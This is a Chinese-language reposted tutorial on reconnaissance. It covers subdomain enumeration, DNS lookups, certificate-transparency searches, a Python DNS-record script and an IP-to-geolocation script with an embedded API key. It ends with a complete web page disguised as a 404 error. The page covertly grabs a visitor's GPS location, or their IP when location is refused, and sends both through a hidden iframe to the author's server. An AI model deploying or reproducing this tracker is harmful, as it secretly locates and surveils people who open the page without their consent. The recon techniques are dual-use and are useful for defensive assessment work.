當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

子域名查询DNS记录查询

發布時間：2024/6/3 编程问答 18 豆豆

生活随笔收集整理的這篇文章主要介紹了子域名查询DNS记录查询小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

子域名信息查詢

Layer子域名爆破機

subDomainBrute

利用google查詢

HTTP證書查詢

DNS記錄查詢腳本

IP轉換為經緯度

利用網頁獲取對方經緯度信息

首先關于DNS域名解析的一些知識，傳送門——>?DNS域名解析基礎

了解了DNS解析的一些知識后，我們就可以開始我們的DNS探測了！

一些和域名查詢相關的網站：

DNS查詢：https://dnsdb.io/
微步在線：https://x.threatbook.cn/?
在線域名信息查詢：http://toolbar.netcraft.com/site_report?url=
DNS、IP等查詢：http://viewdns.info/
CDN查詢IP：https://tools.ipip.net/cdn.php?
SecurityTrails平臺：https://securitytrails.com/domain/www.baidu.com/history/a

子域名信息查詢

相關文章：論二級域名收集的各種姿勢

查詢子域名有三種方法：

通過爆破子域名進行查詢，如 Layer子域名爆破機、subDomainBrute，在線子域名查詢網站：https://phpinfo.me/domain/?

通過查詢DNS服務器，查詢該域下的解析記錄

通過HTTPS證書來查詢(只適用于https網站) ，如：https://crt.sh/? ?就是通過https證書查詢子域名

通過google查詢

Layer子域名爆破機

Layer是windows下的一款子域名探測工具，其工作原理是利用子域名字典進行爆破，使用簡單容易上手。

鏈接: ?https://pan.baidu.com/s/1IS1QCeb6vPIpabBr3LBJ6w ? 提取碼: w749?

subDomainBrute

subDomainBrute的特點是可以用小字典遞歸的發現三級域名、四級域名、甚至五級域名等不容易被探測到的域名。

字典較為豐富，小字典就包括1萬5千條，大字典多達6萬3千條
默認使用114DNS、百度DNS、阿里DNS這幾個快速又可靠的Public DNS查詢，可修改配置文件添加DNS服務器（在dict里面可以進行添加）
自動去重泛解析的域名，當前規則：超過2個域名指向同一IP，則此后發現的其他指向該IP的域名將被丟棄

相關文章：子域名爆破工具subDomainsBrute

利用google查詢

指定站點，然后-就是不包含這個，來查詢

site:baidu.com -www

HTTP證書查詢

證書透明度(Certificate Transparency)是證書授權機構的一個項目，證書授權機構會將每個SSL/TLS證書發布到公共日志中。一個SSL/TLS證書通常包含域名、子域名和郵件地址。查找某個域名所屬證書的最簡單的方法就是使用搜索引擎搜索一些公開的CT日志。在線網站：https://crt.sh?

可以使用python腳本ct-exposer完成

DNS記錄查詢腳本

# -*- coding: utf-8 -*-

# python3.7環境

"""

Created on Wed Apr 10 16:40:17 2019

@author: 小謝

"""

##############################################################DNS域名記錄查詢腳本######################################################

import dns.resolver

domain=input("請輸入要查詢的域名全拼(例如：www.baidu.com)：") #網站子域名

domainpart=[]

num=domain.count('.')

part=domain.split('.')

for i in range(num):

j=i+1

domainpart.append(part[j])

subdomain=".".join(domainpart) #網站主域名

print("該網站主域名為：%s"%subdomain)

#查詢A記錄

A=dns.resolver.query(domain,'A')

print("********************A記錄********************")

for i in A.response.answer:

print(i)

#查詢CNAME記錄

try:

CNAME=dns.resolver.query(domain,'CNAME')

print("********************CNAME記錄********************")

for i in CNAME.response.answer:

print(i)

except:

print("--------------------該域名沒有CNAME記錄!!--------------------")

#domain=input("請輸入要查詢的主域名(例如：baidu.com)：")

#查詢MX記錄

try:

MX=dns.resolver.query(subdomain,'MX')

print("********************MX記錄********************")

for i in MX.response.answer:

print(i)

except:

print("--------------------該域名沒有MX記錄!!--------------------")

#NS記錄

try:

NS=dns.resolver.query(subdomain,'NS')

print("********************NS記錄********************")

for i in NS.response.answer:

print(i)

except:

print("--------------------該域名沒有NS記錄!!--------------------")

#SOA記錄

try:

SOA=dns.resolver.query(subdomain,'SOA')

print("********************SOA記錄********************")

for i in SOA.response.answer:

print(i)

except:

print("--------------------該域名沒有SOA記錄!!--------------------")

#TXT記錄

try:

TXT=dns.resolver.query(subdomain,'TXT')

print("********************TXT記錄********************")

for i in TXT.response.answer:

print(i)

except:

print("--------------------該域名沒有TXT記錄!!--------------------")

#SRV記錄

try:

SRV=dns.resolver.query(domain,'SRV')

print("********************SRV記錄********************")

for i in SRV.response.answer:

print(i)

except:

print("--------------------該域名沒有SRV記錄!!--------------------")

#AAAA記錄

try:

SRV=dns.resolver.query(domain,'AAAA')

print("********************AAAA記錄********************")

for i in SRV.response.answer:

print(i)

except:

print("--------------------該域名沒有AAAA記錄!!--------------------")

IP轉換為經緯度

# -*- coding: utf-8 -*-

# python2.7環境

"""

Created on Wed Apr 10 16:50:26 2019

@author: 小謝

"""

#####################################################將ip轉換為具體的經緯度城市信息#######################################################

#返回數據格式鏈接: http://lbsyun.baidu.com/index.php?title=webapi/ip-api

import urllib2

import json

ip = raw_input("please your ip address:")

url = "http://api.map.baidu.com/location/ip?ip=%s&ak=GrwQFVVB5qDWviGtSoB4VbU4KK10QVLy&coor=bd09ll"%ip

req = urllib2.Request(url)

res_data = urllib2.urlopen(req)

res = res_data.read().decode("unicode-escape") # 轉格式

jsonaddress=json.loads(res)

#print res

print "城市：",jsonaddress['content']['address']

print "省份：",jsonaddress['content']['address_detail']['province']

print "區縣：",jsonaddress['content']['address_detail']['district']

print "街道：",jsonaddress['content']['address_detail']['street']

print "經緯度：",jsonaddress['content']['point']['x'],",",jsonaddress['content']['point']['y']

print "緯經度：",jsonaddress['content']['point']['y'],",",jsonaddress['content']['point']['x']

經緯度街景地圖：谷歌街景地圖

只需要輸入緯度,經度，就可以看到定位的街景地圖。

利用網頁獲取對方經緯度信息

<!DOCTYPE html>

<html>

<head>

<title>404 頁面不存在 </title>

if(navigator.geolocation){ //如果當前瀏覽器支持定位

navigator.geolocation.getCurrentPosition(getPositionSuccess, getPositionError);

}else{

console.log("您的瀏覽器不支持自動定位!");

}

/***用戶定位成功**/

function getPositionSuccess(position){

var lat = position.coords.latitude; //經度

var lng = position.coords.longitude; //緯度

var address="";

//通過baiduMap API獲取街道名稱

var map = new BMap.Map("allmap");

var point = new BMap.Point(lng,lat);

var gc = new BMap.Geocoder();

gc.getLocation(point, function(rs){

var addComp = rs.addressComponents;

address = addComp.city + addComp.district + addComp.street + addComp.streetNumber; //城市區縣街道街道號

$("#lng").attr("value",lng); //經度

$("#lat").attr("value",lat); //緯度

url="http://120.79.74.249:8080/?lng="+lat+","+lng; //將經緯度信息傳給我們后臺搭建的服務器

var frame=$("<iframe>");

frame.attr("src",url);

frame.attr("style","display:none");

$("#body").append(frame);

});

}

/**用戶定位失敗**/

function getPositionError(error){

var ip;

switch(error.code){

case error.TIMEOUT:

console.log("連接超時，請重試");

break;

case error.PERMISSION_DENIED:

//如果對方拒絕定位，則先通過獲取對方ip向百度API獲取定位

ip=returnCitySN.cip;

$.getJSON("http://api.map.baidu.com/location/ip?callback=?", {

'ak' : 'nbB3KwnfDq6UvNxGqkRfhOzeu7EnmNCH',

'coor' : 'bd09ll',

'ip' : ip//獲取的ip地址

}, function(data) {

var lng=data.content.point.x;//經度

var lat=data.content.point.y;//緯度

$("#lng").attr("value",lng); //經度

$("#lat").attr("value",lat); //緯度

url="http://120.79.74.249:8080/?ip="+ip+"&address="+lat+","+lng; //將ip和經緯度信息傳給我們后臺搭建的服務器

var frame=$("<iframe>");

frame.attr("src",url);

frame.attr("style","display:none");

$("#body").append(frame);

});

break;

case error.POSITION_UNAVAILABLE:

console.log("親愛的火星網友，非常抱歉，我們暫時無法為您所在的星球提供位置服務");

break;

}

</script>

body,div,h3,h4,li,ol{margin:0;padding:0}

body{font:14px/1.5 'Microsoft YaHei','微軟雅黑',Helvetica,Sans-serif;min-width:1200px;background:#f0f1f3;}

:focus{outline:0}

h3,h4,strong{font-weight:700}

a{color:#428bca;text-decoration:none}

a:hover{text-decoration:underline}

.error-page{background:#f0f1f3;padding:80px 0 180px}

.error-page-container{position:relative;z-index:1}

.error-page-main{position:relative;background:#f9f9f9;margin:0 auto;width:617px;-ms-box-sizing:border-box;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:50px 50px 70px}

</style>

</head>

<h3>

<strong>404</strong>很抱歉，您要訪問的頁面不存在！

</div>

</h3>

</div>

</body>

</html>

相關文章：?子域名枚舉的藝術深度剖析

? ? ? ? ? ? ? ? ??Freebuf-DNS域名信息收集

? ? ? ? ? ? ? ? ??DNS詳解

?

總結

以上是生活随笔為你收集整理的子域名查询DNS记录查询的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

域名
dns

上一篇：使用BurpSuite抓取HTTPS网站
下一篇： Google Hacking的用法